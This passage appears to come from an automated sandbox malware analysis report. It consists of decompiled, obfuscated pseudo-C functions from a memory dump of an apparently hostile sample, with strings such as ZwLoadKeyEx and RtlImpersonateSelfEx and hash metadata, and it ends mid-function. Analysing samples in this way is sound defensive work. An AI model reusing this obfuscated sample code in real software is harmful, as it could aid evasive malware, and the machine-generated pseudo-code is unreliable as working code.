                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: B5d$RtlImpersonateSelfEx$ZwLoadKeyEx$psxdllsvr.dll$wmi.dll
                                                          • API String ID: 0-3038952217
                                                          • Opcode ID: 3b71fb290dd3361d19df329fee83dd1267edef187d353b52f1eb0fb0144e4fda
                                                          • Instruction ID: 7830e6be52c85e6e4af44c14103da85aa597430e954a9a9d13c1eb4e04d3e9b1
                                                          • Opcode Fuzzy Hash: 3b71fb290dd3361d19df329fee83dd1267edef187d353b52f1eb0fb0144e4fda
                                                          • Instruction Fuzzy Hash: 0A512B69A44782CFC700CF7AEC44FDD3FB2EB79710B08526AD8949B3A6E6750409E715
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E004BF25C(signed int __ecx, signed int __edx, void* __edi, void* __esi) {
                                                          				char* _v12;
                                                          				intOrPtr _t9;
                                                          				char* _t10;
                                                          				char _t18;
                                                          				intOrPtr _t23;
                                                          				char _t30;
                                                          				char* _t39;
                                                          				signed char _t56;
                                                          				void* _t62;
                                                          
                                                          				_t56 = __edx;
                                                          				_t48 = __ecx;
                                                          				if((__edx & 0x00000088) != 0) {
                                                          					L10:
                                                          					 *0x50822e = _t56;
                                                          					goto L11;
                                                          				} else {
                                                          					_t23 = _t9;
                                                          					 *0x50afe5 = _t23;
                                                          					 *0x50afe5 = _t23;
                                                          					 *0x508034 =  *0x508034 + "CreateMutexW";
                                                          					_t29 = 0x2844;
                                                          					_t39 = ("GetTickCount64" & 0x00000051) + 0x59;
                                                          					 *0x508170 = __ecx + 1;
                                                          					_t48 =  *0x5081a6; // 0xbee4
                                                          					 *0x509ad7 =  *0x509ad7 + 0x96a5;
                                                          					_t62 = 0x12d4a;
                                                          					if(0 == 0) {
                                                          						L5:
                                                          						_t48 = (_t48 & 0x005d9e50) + 0x7045;
                                                          						 *0x50afdf =  *0x50afdf + _t62;
                                                          						goto L6;
                                                          					} else {
                                                          						 *0x50afe3 = 0x2844;
                                                          						 *0x50870d =  *0x50870d - __edi;
                                                          						_t29 = 0xfd578;
                                                          						if(0 != 0x1989) {
                                                          							L6:
                                                          							_t56 = _t62 + _t62;
                                                          							if((_t56 & 0x0000009a) < 0) {
                                                          								L11:
                                                          								_t10 =  *0x50afe1; // -128
                                                          								 *0x50afe3 = _t10 - 0xc3;
                                                          								_v12 = _t39;
                                                          								 *0x50afdd =  *0x50afdd - _t48;
                                                          								 *0x508144 = _t48;
                                                          								 *0x5097df =  *0x5097df - _t56;
                                                          							} else {
                                                          								_t56 = 0xa775;
                                                          								 *0x50afe1 = _t29;
                                                          								_t30 =  *0x50afe3; // -68
                                                          								 *0x50afe6 = _t30;
                                                          								 *0x50afd8 =  *0x50afd8 - _t30 + _t30 + 0x9b315;
                                                          								_t39 = 0x3b32e4;
                                                          								if(0x3b32e4 == 0x3b32e4) {
                                                          									_t48 = 0x6b;
                                                          									 *0x50afde =  *0x50afde - 0x6b;
                                                          									 *0x508194 = 0;
                                                          									_t62 = 0;
                                                          									goto L9;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t29 = "lyncicon.exe";
                                                          							if(_t39 >= 0x3a) {
                                                          								L9:
                                                          								_t56 = _t62 - 1;
                                                          								goto L10;
                                                          							} else {
                                                          								_t39 = "api-ms-win-core-sysinfo-l1-1-0.dll";
                                                          								goto L5;
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				 *0x5081e4 = _t56;
                                                          				 *0x50afe3 =  *0x50afe3 - 0xbc;
                                                          				_t18 =  *0x50afe3; // -68
                                                          				 *0x50afe5 =  *0x50afe5 + _t18;
                                                          				 *0x50afe6 = _t18;
                                                          				 *0x50805a =  *0x50805a + 0x12a515;
                                                          				return 0;
                                                          			}













                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CreateMutexW$GetTickCount64$api-ms-win-core-sysinfo-l1-1-0.dll$lyncicon.exe$2;
                                                          • API String ID: 0-164973337
                                                          • Opcode ID: 2beaa060368e406c5337ea5664c7da24f5cfdc5351bcd975c915a6668df5af08
                                                          • Instruction ID: 9577fbc2603e87b21bec4ef7c0b25157a06e457f31bd73c22798c8569fcc6440
                                                          • Opcode Fuzzy Hash: 2beaa060368e406c5337ea5664c7da24f5cfdc5351bcd975c915a6668df5af08
                                                          • Instruction Fuzzy Hash: 7A41039E509B824FC701DF7CEC58ACD3FA1DB7A32070862AA8894877A7E124050EE717
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 71%
                                                          			E004F306A(short __ecx, unsigned short __edi) {
                                                          				void* _t25;
                                                          				char _t26;
                                                          				intOrPtr _t28;
                                                          				intOrPtr _t31;
                                                          				intOrPtr _t34;
                                                          				void* _t39;
                                                          				intOrPtr _t40;
                                                          				char _t45;
                                                          				short _t84;
                                                          				signed char _t93;
                                                          				signed short _t94;
                                                          				signed char _t102;
                                                          				signed int _t103;
                                                          				void* _t116;
                                                          				signed short _t119;
                                                          				void* _t128;
                                                          
                                                          				_t112 = __edi;
                                                          				_pop(_t25);
                                                          				_pop(_t93);
                                                          				_t26 =  *((intOrPtr*)(_t25 + _t93 * 4));
                                                          				if(_t26 < 0x4eb92) {
                                                          					L5:
                                                          					 *((intOrPtr*)(_t128 - 8)) =  *((intOrPtr*)(_t128 - 8)) + 0x6d07;
                                                          					 *0x5081a0 = 0x6d07;
                                                          					_t84 = 0x6d07 - _t93;
                                                          					 *0x508220 = _t93;
                                                          					if((_t93 & 0x000000af) > 0) {
                                                          						if((_t119 & 0x0000bbdf) < 0) {
                                                          						}
                                                          						 *0x50aa22 =  *0x50aa22 + _t112;
                                                          					}
                                                          					L9:
                                                          					 *0x50b010 =  *0x50b010 - _t112;
                                                          					 *0x50afd8 =  *0x50afd8 + _t26;
                                                          					_t94 =  *(_t128 - 0x40);
                                                          					if(_t119 != 0) {
                                                          						L12:
                                                          						 *0x5084cf =  *0x5084cf + _t26;
                                                          						L13:
                                                          						if(_t84 >= _t84) {
                                                          							E00508174 = _t84;
                                                          							 *0x5081f4 = _t94;
                                                          							 *0x50afe3 =  *0x50afe3 - _t26;
                                                          							_t119 = 0x215102;
                                                          							_t112 = 0x50abd0;
                                                          							 *0x50afe6 = _t26;
                                                          							 *0x50806c =  *0x50806c - _t26;
                                                          						}
                                                          						 *__edx = _t26;
                                                          						if((_t94 & 0x00008af3) == 0) {
                                                          							 *0x509dbf =  *0x509dbf - 0xaa7d;
                                                          							_t119 = 0xd1e9;
                                                          						}
                                                          						_push(_t94);
                                                          						_push(_t26);
                                                          						_t28 =  *((intOrPtr*)(_t128 - 0x20));
                                                          						_t116 = ((_t112 >> 1) + 1 >> 1) - 1;
                                                          						_push( *((intOrPtr*)(_t128 - 0x28)));
                                                          						 *((intOrPtr*)(_t128 - 8)) = _t28;
                                                          						 *0x50afe3 = _t28;
                                                          						 *0x508707 =  *0x508707 + _t116;
                                                          						_pop(_t102);
                                                          						_push(_t102);
                                                          						if((_t102 & 0x00000088) == 0) {
                                                          							 *0x50afe1 = 0xef;
                                                          							_t40 =  *0x50afe3; // -68
                                                          							 *0x50afe5 = _t40 - 0xd0;
                                                          							if(_t116 >= 0) {
                                                          								_t116 = _t116 + 1;
                                                          							}
                                                          						}
                                                          						_t31 =  *((intOrPtr*)(_t128 - 8));
                                                          						 *0x50afe3 =  *0x50afe3 + _t31;
                                                          						_t34 = _t31;
                                                          						 *((intOrPtr*)(_t128 - 0xc)) = _t34;
                                                          						_pop(_t103);
                                                          						 *0x509b0f =  *0x509b0f - _t103;
                                                          						_push(_t103);
                                                          						 *0x5081e2 = _t103;
                                                          						_push( *((intOrPtr*)( *((intOrPtr*)(_t128 - 0xc)) + _t103 * 4)));
                                                          						_pop(_t39);
                                                          						if(_t116 + _t116 != 0) {
                                                          							L23:
                                                          							goto L24;
                                                          						} else {
                                                          							if(_t39 > 0x1013) {
                                                          								L25:
                                                          								_push( *(_t128 - 0x40));
                                                          								_push(_t39);
                                                          								_push(1);
                                                          								_push(E004F330A);
                                                          								_push(E004EC8A7);
                                                          								return _t39;
                                                          							}
                                                          							if("api-ms-win-core-rtlsupport-l1-1-0.dll" >= "api-ms-win-core-rtlsupport-l1-1-0.dll") {
                                                          								L24:
                                                          								 *0x508226 =  !0x8e3a;
                                                          								goto L25;
                                                          							}
                                                          							goto L23;
                                                          						}
                                                          					}
                                                          					 *0x50afe5 =  *0x50afe5 - _t26;
                                                          					 *0x50afe5 = _t26;
                                                          					if(_t112 >= 0) {
                                                          						goto L13;
                                                          					} else {
                                                          						_t112 = _t112 - 0x198cc;
                                                          						goto L12;
                                                          					}
                                                          				}
                                                          				 *0x50893f =  *0x50893f + _t26;
                                                          				 *0x508132 = __ecx;
                                                          				_t84 = 0x7bc0;
                                                          				 *0x5081d0 = _t93;
                                                          				_t119 = _t93 - 0x996b01;
                                                          				_t45 = _t26;
                                                          				if(_t119 <= 0) {
                                                          					L3:
                                                          					if(_t45 > _t45) {
                                                          						goto L9;
                                                          					}
                                                          					L4:
                                                          					goto L5;
                                                          				}
                                                          				_t112 = __edi + 0xda5d;
                                                          				 *0x50ac58 =  *0x50ac58 - _t112;
                                                          				 *0x508046 =  *0x508046 - _t26;
                                                          				 *0x50883f =  *0x50883f - _t26;
                                                          				_t45 = 0xd1ba6;
                                                          				if(0xd1ba6 != 0x36) {
                                                          					goto L4;
                                                          				}
                                                          				goto L3;
                                                          			}




















                                                          Strings
                                                          • tsbyuv.dll, xrefs: 004F324D
                                                          • api-ms-win-core-rtlsupport-l1-1-0.dll, xrefs: 004F32BC
                                                          • SystemPropertiesComputerName.exe, xrefs: 004F3154
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: SystemPropertiesComputerName.exe$api-ms-win-core-rtlsupport-l1-1-0.dll$tsbyuv.dll
                                                          • API String ID: 0-1828556471
                                                          • Opcode ID: 41869c88c3748de0dd35912a072f78c29baa79d2f9dcbfcb317a4b16e30960cc
                                                          • Instruction ID: 672a03499394964dd9861684983758713d79979eeecf5b4f69bd079bb5dbfc5e
                                                          • Opcode Fuzzy Hash: 41869c88c3748de0dd35912a072f78c29baa79d2f9dcbfcb317a4b16e30960cc
                                                          • Instruction Fuzzy Hash: 33613ABAA447458FC701CF79ED54AEE3BF1EF7A720704526AC980973A2E7240909E745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E004BEACF(signed char __eax, void* __ebx, signed char __ecx, signed int __edi, void* __esi) {
                                                          				signed char _t32;
                                                          				char _t33;
                                                          				signed char _t34;
                                                          				signed char _t36;
                                                          				void* _t40;
                                                          				signed char _t41;
                                                          				signed char _t42;
                                                          				signed char _t48;
                                                          				void* _t49;
                                                          				intOrPtr _t55;
                                                          				char* _t69;
                                                          				char* _t70;
                                                          				signed char _t73;
                                                          				signed int _t78;
                                                          				intOrPtr _t79;
                                                          				signed short _t89;
                                                          				signed int _t92;
                                                          				signed int _t94;
                                                          				void* _t95;
                                                          				signed short _t98;
                                                          				void* _t100;
                                                          
                                                          				_t95 = __esi;
                                                          				_t92 = __edi;
                                                          				_t73 = __ecx;
                                                          				_t32 = __eax;
                                                          				if(_t32 == 0) {
                                                          					return _t32;
                                                          				} else {
                                                          					if(__ebx == __ecx) {
                                                          					}
                                                          					_t79 =  *0x5081c4; // 0x3542
                                                          					 *0x50820e =  *0x50820e - _t79 - 0x979d;
                                                          					_t98 = _t95 + 0xa44419 >> _t73;
                                                          					 *(_t100 - 0x20) = _t32;
                                                          					 *(_t100 - 8) = _t32;
                                                          					if(0x994 != 0) {
                                                          						L6:
                                                          						_t33 = _t32 - 0xe8;
                                                          						 *0x50afd8 = _t33;
                                                          						if(_t33 < 0x10) {
                                                          							 *0x50899b =  *0x50899b + _t33 + 0x1c7017;
                                                          						}
                                                          						 *0x50811c =  *0x50811c + _t73;
                                                          					} else {
                                                          						if(0x94 == 0) {
                                                          							_t32 = 0xbf;
                                                          							 *0x50a7a5 =  *0x50a7a5 + _t98;
                                                          							 *0x50afe5 = 0xbf;
                                                          							goto L6;
                                                          						}
                                                          					}
                                                          					 *0x5081d6 = 0xffffffffff883c40;
                                                          					_t34 =  *(_t100 - 8);
                                                          					_push(0);
                                                          					 *0x5081d6 = 0xffffffffff87b69e;
                                                          					if(0x42114 >= 0) {
                                                          						 *0x50afe3 = _t34;
                                                          					}
                                                          					_t55 =  *0x50afe5; // -1
                                                          					 *0x5086d7 =  *0x5086d7 - _t92;
                                                          					 *0x5086f3 =  *0x5086f3 + _t92;
                                                          					 *(_t100 - 8) = _t34;
                                                          					E004B310A(_t34, 0, _t98);
                                                          					_t36 =  *(_t100 - 8);
                                                          					_push(1);
                                                          					 *0x50afdc =  *0x50afdc - _t55 + _t34 - _t36 + 0x30ebcb;
                                                          					_t78 = 0 << 0;
                                                          					_push( *((intOrPtr*)(_t100 - 0x14)));
                                                          					_t94 =  !_t92;
                                                          					_t40 = _t36;
                                                          					 *0x50998b =  *0x50998b - 0x8da8;
                                                          					 *0x508208 = 0x8da8;
                                                          					if((_t98 & 0x0000b514) >= 0) {
                                                          					}
                                                          					if(_t40 < 0) {
                                                          						 *0x50add4 =  *0x50add4 + _t94;
                                                          					}
                                                          					 *0x50888b =  *0x50888b - _t40;
                                                          					 *0x50afd9 =  *0x50afd9 + _t40;
                                                          					 *(_t100 - 8) = _t78;
                                                          					_t41 =  *(_t100 - 0x20)();
                                                          					 *0x50820e =  *0x50820e + 0xffffffffffffe076;
                                                          					 *(_t100 - 8) = _t41;
                                                          					if((_t78 & 0x00714d43) <= 0) {
                                                          						 *0x5081d6 = 0xffffffffffffe076;
                                                          					}
                                                          					_t89 = 0xffffffffffffe11e;
                                                          					_t42 =  *(_t100 - 8);
                                                          					 *0x50889b = _t42;
                                                          					_t69 = "ZwLoadKeyEx";
                                                          					 *(_t100 - 8) = _t42;
                                                          					if(2 > 0) {
                                                          						_t42 = _t42 + _t42;
                                                          					}
                                                          					E004A8660(_t69, _t78, _t98);
                                                          					_t70 = _t69;
                                                          					if((_t89 & 0x000093c4) != 0) {
                                                          						 *0x50afe0 =  *0x50afe0 + _t89;
                                                          					}
                                                          					E004AF4C5(L00466DA9(_t70, _t94, _t98 + _t98, _t98 + _t98, 1), _t70, _t89, _t94, _t98 + _t98);
                                                          					_t48 =  *(_t100 - 8);
                                                          					_push(_t48);
                                                          					if((_t48 & _t48) != 0) {
                                                          						 *0x50afe6 = _t48;
                                                          					}
                                                          					_pop(_t49);
                                                          					_push(_t49);
                                                          					_push(1);
                                                          					_push(0);
                                                          					_push(_t49);
                                                          					_push(0x4becd4);
                                                          					_push(E004BE12C);
                                                          					return _t49;
                                                          				}
                                                          			}
























                                                          0x004becb6
                                                          0x004becbb
                                                          0x004becc3
                                                          0x004becc4
                                                          0x004becc6
                                                          0x004becc8
                                                          0x004becc9
                                                          0x004becce
                                                          0x004becd3
                                                          0x004becd3

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: B5d$CIRCoInst.dll$ZwLoadKeyEx
                                                          • API String ID: 0-4279915688
                                                          • Opcode ID: cf18c908850012e72c8a4b642295ba37e9c1c57233eecf103e095446b7dbe5be
                                                          • Instruction ID: 34d739725143ffc51c2220718e8d30f1ae70247657a9a8b10f7120b27db9c74a
                                                          • Opcode Fuzzy Hash: cf18c908850012e72c8a4b642295ba37e9c1c57233eecf103e095446b7dbe5be
                                                          • Instruction Fuzzy Hash: AC51F379A407428FCB00DF7EEC45BDD3BB1EF75320F04416A9884A7362E6794549E726
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E004DA07A(char __eax, signed int __edx, void* __edi, void* __esi) {
                                                          				intOrPtr _t15;
                                                          				char _t18;
                                                          				signed int _t25;
                                                          				intOrPtr _t28;
                                                          				void* _t30;
                                                          				signed char _t37;
                                                          				signed short _t38;
                                                          				short _t39;
                                                          				short _t40;
                                                          				intOrPtr _t42;
                                                          				void* _t45;
                                                          				void* _t50;
                                                          				void* _t51;
                                                          				void* _t53;
                                                          
                                                          				_t50 = __esi;
                                                          				_t45 = __edi;
                                                          				_t41 = __edx;
                                                          				_t37 = __edx;
                                                          				 *0x50859b =  *0x50859b + __edi;
                                                          				if((__edx & 0x00000098) != 0) {
                                                          					_t41 = __edx - 1;
                                                          					 *0x508f8b = "wlanmsm.dll";
                                                          					_t37 = _t41;
                                                          					 *0x50afe5 = __eax;
                                                          					 *0x50afd8 =  *0x50afd8 - __eax;
                                                          				}
                                                          				_t38 = _t37 + 0x88c5;
                                                          				_t15 = _t53 - 0x2050;
                                                          				 *0x508222 = _t41;
                                                          				_t25 =  !("wlanmsm.dll");
                                                          				if((_t38 & 0x00007f45) == 0) {
                                                          					L5:
                                                          					if(_t25 == _t25) {
                                                          						goto L6;
                                                          					}
                                                          				} else {
                                                          					_t25 = 0x2c5e62 - _t38;
                                                          					_t41 = 0;
                                                          					if(_t50 <= 0) {
                                                          						L6:
                                                          						_t38 = _t38 - _t41;
                                                          					} else {
                                                          						_t25 =  *0x50afd8; // -16
                                                          						goto L5;
                                                          					}
                                                          				}
                                                          				_t51 = _t50 - 1;
                                                          				 *0x508dab = _t25;
                                                          				_t39 = _t38 + _t38;
                                                          				 *((intOrPtr*)(_t53 - 0x20c8)) = _t15;
                                                          				 *0x50afe3 =  *0x50afe3 - 0xc6;
                                                          				_t18 = _t15;
                                                          				if(_t45 - _t15 == 0x70a) {
                                                          					_t30 = 0x1474e1;
                                                          					if(_t18 >= 0x1eb1) {
                                                          						_t30 = 0;
                                                          					}
                                                          					if(_t30 < _t30) {
                                                          						 *0x508100 =  *0x508100 - _t30;
                                                          						 *0x508136 = _t39;
                                                          					}
                                                          					_t39 =  *0x50816c; // 0x28a9
                                                          					 *0x5081a2 =  *0x5081a2 - _t39;
                                                          					 *0x50972b =  *0x50972b - _t41;
                                                          					_t41 =  *0x508206; // 0x94da
                                                          				}
                                                          				if((_t41 & 0x000000af) > 0) {
                                                          					_t51 = _t51 + _t51;
                                                          					_t28 =  *0x50afe3; // -68
                                                          					 *0x50afe5 = _t18;
                                                          					 *0x508030 =  *0x508030 + _t18;
                                                          					if(_t18 == 0x1fbc) {
                                                          						_t28 = 0x31adc9;
                                                          					}
                                                          					 *0x508e33 = _t28;
                                                          					_t39 = 0x5ed0;
                                                          				}
                                                          				 *((intOrPtr*)(_t53 - 8)) =  *((intOrPtr*)(_t53 - 8)) - _t39;
                                                          				_push( *((intOrPtr*)(_t53 - 0x20c8)));
                                                          				_t40 =  *0x508140; // 0x15
                                                          				 *0x508192 = _t40;
                                                          				_t42 =  *0x5081de; // 0xa5c4
                                                          				 *0x509b0b =  *0x509b0b - _t42;
                                                          				 *((intOrPtr*)(_t53 - 8)) = _t18;
                                                          				_push(1);
                                                          				_push(0);
                                                          				_push(1);
                                                          				_push(E004DA1F8);
                                                          				_push(E004B009D);
                                                          				return _t18;
                                                          			}


















                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: IsTopLevelWindow$b^,$wlanmsm.dll
                                                          • API String ID: 0-4194069097
                                                          • Opcode ID: 48dfd037b0282bc786cd7866a95f85aad3cc1fa3089a5ea49167897dac4de42d
                                                          • Instruction ID: a95459f7d239d6da1477d81566fcff6eecb4a31fefa5694fec8c53e908126158
                                                          • Opcode Fuzzy Hash: 48dfd037b0282bc786cd7866a95f85aad3cc1fa3089a5ea49167897dac4de42d
                                                          • Instruction Fuzzy Hash: DD31E1756047528BC320DF35ECA8AEE3B71EB3D320B04026BC998937A7E6750948E749
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E004EE626() {
                                                          				signed char _t23;
                                                          				char _t24;
                                                          				intOrPtr _t25;
                                                          				void* _t28;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t55;
                                                          				short _t56;
                                                          				intOrPtr _t66;
                                                          				signed char _t71;
                                                          				void* _t72;
                                                          				signed int _t80;
                                                          				void* _t81;
                                                          
                                                          				_t23 = 0;
                                                          				_t71 =  *0x5081b4; // 0x19f4
                                                          				if((_t71 & 0x00000096) < 0) {
                                                          					 *0x509a5f =  *0x509a5f + _t71;
                                                          					_t71 =  *0x508238; // 0x5364
                                                          					if((_t80 & 0x00a78b71) >= 0) {
                                                          						 *0x508349 =  *0x508349 + _t80;
                                                          					}
                                                          					_t23 = 0xfffffffffff317fd;
                                                          				}
                                                          				 *0x50883f =  *0x50883f + _t23;
                                                          				 *0x508967 = _t23;
                                                          				_push(8);
                                                          				 *0x50afda =  *0x50afda - _t28;
                                                          				_t55 =  *0x508170; // 0x2575
                                                          				_t56 = _t55 - 0x81;
                                                          				_t24 = _t81 - 0x20;
                                                          				if(_t28 != _t28) {
                                                          					L6:
                                                          					 *0x50822c = _t71;
                                                          					goto L7;
                                                          				} else {
                                                          					_t66 =  *0x50813e; // 0x7e29
                                                          					_t56 = _t66 - 0x6a;
                                                          					 *0x50818e = _t56;
                                                          					_t71 = 0;
                                                          					if(0 >= 0) {
                                                          						L7:
                                                          						 *0x50afe5 = _t24;
                                                          						 *((intOrPtr*)(_t81 - 0x18)) = _t24;
                                                          						if(_t24 < 0) {
                                                          							 *0x50afdc =  *0x50afdc + 0x4318ca;
                                                          							if(0x4318ca > _t56) {
                                                          								_t56 = 0x723c;
                                                          								 *0x5081ae = _t71;
                                                          								_t71 = 0x99a8;
                                                          								 *0x50afe1 = _t24;
                                                          								if(_t80 == 0) {
                                                          									 *0x50a9c2 =  *0x50a9c2 + _t80;
                                                          								}
                                                          								 *0x50afe5 = _t24;
                                                          							}
                                                          							 *0x508028 =  *0x508028 - _t24;
                                                          							 *((intOrPtr*)(_t81 - 8)) = 4 - _t24 + 0x2470;
                                                          						}
                                                          						_push( *((intOrPtr*)(_t81 - 0x18)));
                                                          						_t72 = _t71 + 1;
                                                          						 *0x50afe1 = _t24;
                                                          						 *((intOrPtr*)(_t81 - 8)) = _t24;
                                                          						_t25 =  *((intOrPtr*)(_t81 - 8));
                                                          						 *0x508837 = _t25;
                                                          						if(_t25 >= 0x2908b8) {
                                                          							_t38 = "diskperf.exe" - 1;
                                                          							 *((intOrPtr*)(_t81 - 8)) = _t38;
                                                          							 *((intOrPtr*)(_t81 - 8)) = _t38;
                                                          						}
                                                          						 *((intOrPtr*)(_t81 - 8)) = _t25;
                                                          						 *((intOrPtr*)(_t81 - 0xc)) =  *((intOrPtr*)(_t81 - 0xc)) - 0x64f0;
                                                          						_push(1);
                                                          						_push(_t72 + _t72);
                                                          						_push(E004EE7C8);
                                                          						goto __edx;
                                                          					}
                                                          					goto L6;
                                                          				}
                                                          			}
















                                                          Strings
                                                          • diskperf.exe, xrefs: 004EE78D
                                                          • Microsoft.Office.Tools.Outlook.v9.0.ni.dll, xrefs: 004EE6EC
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Microsoft.Office.Tools.Outlook.v9.0.ni.dll$diskperf.exe
                                                          • API String ID: 0-1461251385
                                                          • Opcode ID: 52551f3e53c6d927bf3cdf5840391c91b33024b5f0452680534ab3d817cf4f74
                                                          • Instruction ID: 2b01366b76d156ca88fb34e13ff27444dd900445018af0040819d1ebb70d9d92
                                                          • Opcode Fuzzy Hash: 52551f3e53c6d927bf3cdf5840391c91b33024b5f0452680534ab3d817cf4f74
                                                          • Instruction Fuzzy Hash: 7341F6B9E407828FCB00DF76EC94AED3BA1FF7A310B04916EC48587366E6340409E746
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E004D442B(char __eax, short __ecx, signed int __edx, void* __edi, void* __esi) {
                                                          				intOrPtr _t15;
                                                          				char _t17;
                                                          				intOrPtr _t21;
                                                          				signed char _t24;
                                                          				intOrPtr _t38;
                                                          				short _t39;
                                                          				signed int _t43;
                                                          				signed short _t44;
                                                          				void* _t49;
                                                          				void* _t53;
                                                          				void* _t56;
                                                          
                                                          				_t53 = __esi;
                                                          				_t49 = __edi;
                                                          				_t43 = __edx;
                                                          				_t39 = __ecx;
                                                          				_t14 = __eax;
                                                          				if((__edx & 0x000000a8) < 0) {
                                                          					 *0x50afe1 =  *0x50afe1 + __eax;
                                                          					_t14 =  *0x50afe5; // -1
                                                          				}
                                                          				 *0x50afe6 = _t14;
                                                          				_t15 =  *((intOrPtr*)(_t56 - 8));
                                                          				_t26 = 0xe896b;
                                                          				_push(_t15);
                                                          				 *0x50afd8 =  *0x50afd8 + _t15;
                                                          				if(_t15 >= 0x20b5) {
                                                          					_t15 = 0x2b7a69;
                                                          					_t38 =  *0x508f77; // 0x0
                                                          					_t26 = _t38 - 0x61;
                                                          					 *0x508172 = _t39;
                                                          				}
                                                          				E004C1383(_t15, _t26, _t39, _t43, _t49, _t53, 1, 0);
                                                          				_t44 = _t43 + 0x91;
                                                          				_pop(_t17);
                                                          				if((_t44 & 0x00009edc) > 0) {
                                                          					_t53 = _t53 + _t53;
                                                          					 *0x50afe3 = _t17;
                                                          					_t49 = _t49 + 0xc70c1a;
                                                          				}
                                                          				 *0x50afe6 =  *0x50afe6 - _t17;
                                                          				 *((intOrPtr*)(_t56 - 8)) = _t17;
                                                          				_push( *0x50ab34);
                                                          				_t21 =  *((intOrPtr*)(_t56 - 8));
                                                          				 *((intOrPtr*)(_t56 - 8)) = _t21;
                                                          				_push(1);
                                                          				_push(1);
                                                          				L004C1747();
                                                          				 *0x50820e = _t44 + 0x7e644c - 0x90;
                                                          				 *0x50810c =  *0x50810c + "lyncicon.exe" + "lyncicon.exe" - 0x42;
                                                          				 *((intOrPtr*)(_t56 - 8)) =  *((intOrPtr*)(_t56 - 8)) + _t39;
                                                          				_push( *((intOrPtr*)(_t56 - 8)));
                                                          				_pop(_t24);
                                                          				if((_t24 & 0x000000ad) == 0) {
                                                          					 *0x50afe5 = 0;
                                                          				}
                                                          				_push(0x4d453c);
                                                          				_push( &M004C4CEF);
                                                          				return _t24;
                                                          			}















                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: iz+$lyncicon.exe
                                                          • API String ID: 0-3828082457
                                                          • Opcode ID: f60200b8202b3f7cae140783b9d13f190544db0958ee5a0a2be1381f855351b8
                                                          • Instruction ID: 9dbf6c66456e8875c4ceee5dcf41c381c2cb3305cf0de791d2bad3734108df17
                                                          • Opcode Fuzzy Hash: f60200b8202b3f7cae140783b9d13f190544db0958ee5a0a2be1381f855351b8
                                                          • Instruction Fuzzy Hash: D32124BAA447819FC701CF78EC65FCD3B60DB72324F08515BA890A73E3E2790549AB16
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E00467A70(short __ecx, signed int __edx, void* __edi, void* __esi) {
                                                          				intOrPtr _v12;
                                                          				char _t9;
                                                          				char _t10;
                                                          				signed int _t23;
                                                          				void* _t42;
                                                          				signed short _t43;
                                                          
                                                          				_t42 = __edi;
                                                          				_t31 = __ecx;
                                                          				if(((__edx | 0x0000008a) & 0x000097af) <= 0) {
                                                          					L3:
                                                          					_t9 =  *0x50afe1; // -128
                                                          					 *0x50afe3 = _t9;
                                                          					_t43 = _t42 + _t42;
                                                          					_t10 =  *0x50afe6; // -97
                                                          					if(_t10 <= 0) {
                                                          					}
                                                          					L5:
                                                          					 *0x50808c =  *0x50808c - _t23;
                                                          					_v12 = _v12 - _t23;
                                                          					 *0x50afdd =  *0x50afdd - _t31;
                                                          					 *0x5097db =  *0x5097db + 0x821e;
                                                          					 *0x50afe3 = 0x1fd84c;
                                                          					if((_t43 & 0x0050835f) > 0) {
                                                          					}
                                                          					 *0x50afe6 = 0x1fd84c;
                                                          					 *0x50805a =  *0x50805a + "diskperf.exe";
                                                          					 *0x50afdc =  *0x50afdc - 0x35fef1;
                                                          					return 0;
                                                          				}
                                                          				 *0x509d4f =  *0x509d4f - __esi;
